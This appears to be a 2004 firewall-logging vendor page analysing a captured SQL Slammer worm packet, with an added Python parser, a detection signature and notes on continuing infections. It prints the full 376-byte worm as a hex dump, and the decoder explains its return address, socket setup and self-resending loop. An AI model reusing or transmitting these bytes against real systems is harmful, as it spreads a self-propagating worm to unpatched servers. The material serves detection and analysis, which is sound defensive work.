PortPeeker Capture of SQL Slammer Event

SQL Slammer description on CERT.org (CERT Advisory CA-2003-04, "MS-SQL Server Worm"). We were among the very first in the world to notice and post about this worm at DSLReports, as it was easy to pick off with Link Logger.

UDP port 1434, the SQL Server Resolution Service (note: always a single packet; the entire worm is one 376-byte datagram, so there is no connection set-up and no follow-on traffic to look for, just the one UDP hit in the log)

Targets unpatched SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 systems, via the Resolution Service buffer overrun that Microsoft fixed in MS02-039 (July 2002, six months before the worm appeared)

202.108.249.51 : 1409 Length = 376 bytes
MD5 = A0AA4A74B70CBCA5A03960DF1A3DC878
---- 18/04/2004 21:11:14.255
0000 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0010 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0020 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0030 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0040 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0050 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0060 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p.
0070 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h..
0080 B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5.
0090 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3
00A0 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick
00B0 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d
00C0 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf
00D0 B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E
00E0 D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P
00F0 BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt.
0100 BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP..
0110 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P.
0120 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E
0130 C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a
0140 D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........
0150 C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j..
0160 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P
0170 8B 45 AC 50 FF D6 EB CA                         .E.P....
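As an added worked example (not part of the original PortPeeker capture and not Link Logger code), the Python below parses the dump above back into the 376 raw bytes, applies the signature a firewall logger can key on (UDP/1434, exactly 376 bytes, SSRS opcode 0x04 followed by 96 bytes of 0x01 overflow filler, then the worm's hand-rolled import strings), and decodes a few constants straight out of the body: the saved return address 0x42B0C9DC (a `jmp esp` inside sqlsort.dll), the sockaddr_in head the worm builds with two XORs (AF_INET, port 1434), the socket() arguments, and the 376-byte send length. The dump text is transcribed from the capture on this page; the function and constant names are mine.

```python
"""Parse the PortPeeker dump above and check it against a Slammer signature."""
import hashlib
import re
import struct

# Transcribed from the PortPeeker capture on this page (offset, hex bytes, ASCII column).
SLAMMER_DUMP = """\
0000 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0010 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0020 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0030 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0040 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0050 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0060 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p.
0070 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h..
0080 B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5.
0090 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3
00A0 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick
00B0 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d
00C0 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf
00D0 B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E
00E0 D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P
00F0 BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt.
0100 BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP..
0110 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P.
0120 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E
0130 C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a
0140 D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........
0150 C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j..
0160 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P
0170 8B 45 AC 50 FF D6 EB CA                         .E.P....
"""

SSRS_PORT = 1434        # SQL Server Resolution Service listens here on UDP
SLAMMER_LEN = 376       # the whole worm is one datagram of exactly this size
CLNT_UCAST_INST = 0x04  # SSRS opcode the worm abuses: first byte of the datagram
FILLER_LEN = 0x60       # bytes of 0x01 padding out to the saved return address
PAGE_MD5 = "A0AA4A74B70CBCA5A03960DF1A3DC878"  # value shown in the capture header
_HEX_PAIR = re.compile(r"[0-9A-F]{2}")


def parse_hexdump(dump: str) -> bytes:
    """Rebuild raw bytes from 'OFFSET HH HH ... ASCII' lines, checking that each
    line's offset equals the number of bytes collected so far."""
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if int(tokens[0], 16) != len(out):
            raise ValueError(f"offset gap at line {tokens[0]!r}")
        for tok in tokens[1:17]:            # at most 16 bytes per line
            if not _HEX_PAIR.fullmatch(tok):  # first non-hex token is the ASCII column
                break
            out.append(int(tok, 16))
    return bytes(out)


def md5_hex(payload: bytes) -> str:
    return hashlib.md5(payload).hexdigest().upper()


def is_slammer(dst_port: int, payload: bytes) -> bool:
    """Signature a firewall logger can key on: the 0x01 run is the overflow
    padding; the strings are the worm resolving kernel32/ws2_32 imports by hand."""
    if dst_port != SSRS_PORT or len(payload) != SLAMMER_LEN:
        return False
    if payload[0] != CLNT_UCAST_INST or payload[1:1 + FILLER_LEN] != b"\x01" * FILLER_LEN:
        return False
    markers = (b"dllhel32", b"kern", b"GetT", b"ws2_", b"sock", b"send")
    return all(m in payload for m in markers)


def overflow_details(payload: bytes) -> dict:
    """Decode constants from the worm body; offsets are found by byte pattern."""
    # Saved return address follows the filler: 0x42B0C9DC, a 'jmp esp' in sqlsort.dll
    ret_addr = struct.unpack_from("<I", payload, 1 + FILLER_LEN)[0]
    # xor ecx,ecx ; push ecx ; push ecx ; push eax ; xor ecx,imm32 ; xor ecx,imm32
    # The two immediates XOR to the sockaddr_in head (sin_family, sin_port).
    i = payload.index(b"\x31\xc9\x51\x51\x50\x81\xf1")
    imm1 = struct.unpack_from("<I", payload, i + 7)[0]
    if payload[i + 11:i + 13] != b"\x81\xf1":
        raise ValueError("expected second xor ecx,imm32")
    imm2 = struct.unpack_from("<I", payload, i + 13)[0]
    head = struct.pack("<I", imm1 ^ imm2)
    family = struct.unpack("<H", head[:2])[0]   # host order: AF_INET
    port = struct.unpack("!H", head[2:])[0]     # network order: 1434
    # push 11h ; push 2 ; push 2 ; call eax  ->  socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
    k = payload.index(b"\x6a\x11\x6a\x02\x6a\x02\xff\xd0")
    socket_args = (payload[k + 5], payload[k + 3], payload[k + 1])
    # xor cx,178h  ->  length handed to sendto(): the worm resends itself whole
    j = payload.index(b"\x66\x81\xf1")
    send_len = struct.unpack_from("<H", payload, j + 3)[0]
    return {"ret_addr": ret_addr, "family": family, "port": port,
            "socket_args": socket_args, "send_len": send_len}


if __name__ == "__main__":
    pkt = parse_hexdump(SLAMMER_DUMP)
    digest = md5_hex(pkt)
    print(len(pkt), "bytes; md5", digest,
          "matches page" if digest == PAGE_MD5 else "differs from page")
    print("slammer:", is_slammer(SSRS_PORT, pkt))
    for name, val in overflow_details(pkt).items():
        print(f"{name:12} {val:#x}" if isinstance(val, int) else f"{name:12} {val}")
```

Because the worm sends itself with a plain socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) and sendto(), rather than a raw socket, the source address logged for each hit is the infected host's real address, which is what makes notifying the owner feasible. The length check matters in the other direction too: a single-byte 0x02 or 0x04 datagram to 1434 is an ordinary SSRS browse or instance request, not the worm.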


Update April 21, 2004.

It has been more than a year since SQL Slammer was released on January 25, 2003, yet it continues to soldier on. We typically see 5 to 6 hits a day from SQL Slammer (from April 1st to 20th, for example, we saw 124 events from 97 sources). Since the worm sends itself from an ordinary UDP socket on the infected machine, the source address in each log entry is the infected host itself, and using our internal PortPeeker version we have been able to directly notify about a third of these systems. We suspect our successful communication rate is much lower, however, given that most of these systems are located in non-English-speaking countries.

Once again this is a sign of how poorly some systems are administered: they have obviously never been patched (for well over a year at least, and the fix, MS02-039, predates the worm by six months). SQL Slammer was to corporations what MSBlast was to home users, a huge wake-up call; some people, however, can evidently sleep through anything. For example, we have seen SQL Slammer traffic from a number of the same systems for at least the last four months.


While PortPeeker is not an officially supported product, if you have any suggestions or find any bugs please send them to PortPeeker@LinkLogger.com